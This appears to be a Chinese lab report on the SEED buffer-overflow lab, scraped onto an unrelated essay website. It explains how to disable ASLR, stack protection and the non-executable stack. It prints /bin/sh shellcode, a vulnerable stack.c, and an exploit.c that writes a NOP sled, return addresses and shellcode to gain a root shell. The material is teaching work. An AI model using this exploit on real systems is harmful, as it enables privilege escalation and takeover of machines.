您的位置首页  散文评论

缓冲区溢出攻击_缓冲区溢出攻击实验报告

Buffer Overflow Vulnerability Lab实验目的:掌握缓冲区溢出漏洞原理。缓冲区溢出定义:程序企图在预分配的缓冲区之外写数据。漏洞危害:用于更改程序执行流,控制函数返回值,执行任意代码。

缓冲区溢出攻击_缓冲区溢出攻击实验报告

 

Buffer Overflow Vulnerability Lab实验目的:掌握缓冲区溢出漏洞原理缓冲区溢出定义:程序企图在预分配的缓冲区之外写数据漏洞危害:用于更改程序执行流,控制函数返回值,执行任意代码。

漏洞产生原因:不可避免,由于程序存储数据(buffer)和程序(return address)都在栈上,当存储数据覆盖了控制数据,就会发生缓冲区溢出的可能学习目标:通过代码设计和利用缓冲区溢出漏洞获取ubuntu12的root权限。

掌握操作系统(linux OS)保护机制,阻止缓冲区溢出攻击你可以在ubuntu12虚拟机中完成本次实验,由于ubuntu中存在一些保护机制,使缓冲区溢出很难实现,为此,我们需要关闭这些保护机制地址随机化(address space randomization)。

堆/栈中的开始地址每次都不一样。关闭地址随机化

栈保护机制(StackGuard Protection)gcc编译器实现的安全机制,阻止缓冲区溢出漏洞你可以关闭这种机制,通过在编译时使用-fno-stack-protector选项栈不可执行(Non-Executable Stack)。

ubuntu12默认栈不可执行,可以通过在编译的时候使用-z execstack选项来使堆栈可执行shellcodeshellcode是一段弹出shell的可执行代码,我们需要将这段可执行代码载入内核的buffer中,。

通过缓冲区溢出漏洞,跳转到这段可执行代码处,让终端弹出shell#includeintmain( ){ char *name[2]; name[0] = ‘‘/bin/sh’’; name[。

1] = NULL; //execve()//参数1:sh可执行文件在系统中的路径指针//参数2:数组指针,传递给执行文件//参数3:传递给执行文件的新环境变量数组 execve(name[0], name,

NULL); }执行效果与直接在/bin/目录下执行./sh效果一样shellcode长什么样?constchar code[] = "\x31\xc0"/* xorl %eax,%eax */。

"\x50"/* pushl %eax */"\x68""//sh"/* pushl $0x68732f2f */"\x68""/bin"

/* pushl $0x6e69622f */"\x89\xe3"/* movl %esp,%ebx */"\x50"/* pushl %eax */

"\x53"/* pushl %ebx */"\x89\xe1"/* movl %esp,%ecx */"\x99"/* cdq */

"\xb0\x0b"/* movb $0x0b,%al */"\xcd\x80"/* int $0x80 */ ;如何让shellcode运行?

intmain(int argc, char **argv){ char buf[sizeof(code)]; strcpy(buf, code); //注意函数指针 ((void

(*)( ))buf)( ); }shellcode汇编代码解读

执行这段程序栈和寄存器中数据:

The Vulnerable Program/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */

#include#include#includeintbof(char *str){ char buffer[24]; /* The following statement has a buffer overflow problem */

strcpy(buffer, str); return1; } intmain(int argc, char **argv){ char str[517]; FILE *badfile; badfile = fopen(

"badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"

); return1; }当badfile文件中内容大小低于缓冲区大小的时候,程序正常当文件内容大小超过缓冲区大小的时候,程序异常,发生缓冲区溢出exploiting the Vulnerability。

利用缓冲区溢出漏洞,实现获取root权限:/* exploit.c *//* A program that creates a file containing code for launching shell*/

#include#include#includechar shellcode[]= "\x31\xc0"/* xorl %eax,%eax */

"\x50"/* pushl %eax */"\x68""//sh"/* pushl $0x68732f2f */"\x68""/bin"

/* pushl $0x6e69622f */"\x89\xe3"/* movl %esp,%ebx */"\x50"/* pushl %eax */

"\x53"/* pushl %ebx */"\x89\xe1"/* movl %esp,%ecx */"\x99"/* cdq */

"\xb0\x0b"/* movb $0x0b,%al */"\xcd\x80"/* int $0x80 */ ; unsigned

longget_sp(){ __asm__("movl %esp,%eax"); } voidmain(int argc, char **argv){ char buffer[517]; FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */

long* addr_ptr,addr; int offset = 200; addr = get_sp() + offset; addr_ptr = (long*)buffer;

for(int i = 0;i<10;i++) *(addr_ptr++) = addr; memcpy(buffer+sizeof(buffer)-sizeof(shellcode), shellcode,

sizeof(shellcode)); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile"

, "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }编译运行程序,即可以获取root权限:

免责声明:本站所有信息均搜集自互联网,并不代表本站观点,本站不对其真实合法性负责。如有信息侵犯了您的权益,请告知,本站将立刻处理。联系QQ:1640731186
相关链接 更多>>
散文评论怎么写好看点散文评论怎么写范文大全集散文大全免费
如何写散文评论文章的句子散文评论要点怎么写范文大全四年级
白鹭的散文评论怎么写的呢散文评论的范文怎么写好对散文形散神不散的理解
网站推荐更多>>
记叙散文和记叙文的区别如何写散文评论文章范文散文遇见余秋雨摘抄
散文评论文章的经典话语有哪些内容呢散文评论怎么写好呢女生2023年散文征稿
  • 缓冲区溢出攻击_缓冲区溢出攻击实验报告
  • 男人三十一枝花_男人三十一枝花歌词
  • 陶喆专辑_陶喆专辑图片
  • 无限迷途_无限迷途烙印怎么获得
  • reno怎么读_Adreno怎么读
  • 毁灭之锤_毁灭之锤外观
  • 阿黛尔·阿德金斯_阿黛尔·阿德金斯减肥
  • 大明风华剧情介绍_大明风华剧情介绍_分集剧情介绍
  • 欧盟总部_布鲁塞尔欧盟总部
  • 诺桑觉寺_诺桑觉寺2007
    • 网站热点更多>>
    记叙散文和记叙文的区别如何写散文评论文章范文散文遇见余秋雨摘抄
    散文评论怎么写好看点散文评论怎么写范文大全集散文大全免费
  • 缓冲区溢出攻击_缓冲区溢出攻击实验报告
  • 沈从文散文_沈从文散文集有哪些学会了吗
  • 男人三十一枝花_男人三十一枝花歌词
  • 电视散文_电视散文《行走在秋天里》学到了吗
  • 陶喆专辑_陶喆专辑图片
  • 经典散文网_经典散文网站推荐不要告诉别人
  • 优美的散文_小散文万万没想到
  • 无限迷途_无限迷途烙印怎么获得
  • 毕淑敏散文_毕淑敏散文作品万万没想到
  • reno怎么读_Adreno怎么读
    • 点击排行更多>>
    散文童话寓言小说有哪些类型的作品呢散文童话的代表作品有哪些名字呢英语怎么说散文最
    散文精选名篇散文精选出题目
  • 让真情自然流露500字作文(让真情自然流露500字作文高兴)
  • 田螺姑娘(田螺姑娘是什么意思)
  • 交个朋友(交个朋友怎么回答对方)
  • 描写春天的古诗(描写春天的古诗30首)
  • 呼和浩特是哪个省(呼和浩特是哪个省哪个城市)
  • 我学会了包饺子(我学会了包饺子作文600字)
  • 长大尾巴的兔子(长大尾巴的兔子故事)
  • 早安温罄句子(早安朋友圈高质量句子)
  • 三年级作文我的植物朋友300字(三年级作文我的植物朋友300字含羞草)
  • 含沙射影是什么意思(含沙射影是什么意思比喻什么)
    • 友情链接: 加链QQ:1640731186

    网站首页|不良信息举报|联系我们|服务协议|免责声明|友情链接|

    Powered by lyswzyy.com © 2023流云散文版权所有 陕ICP备2023003128号-5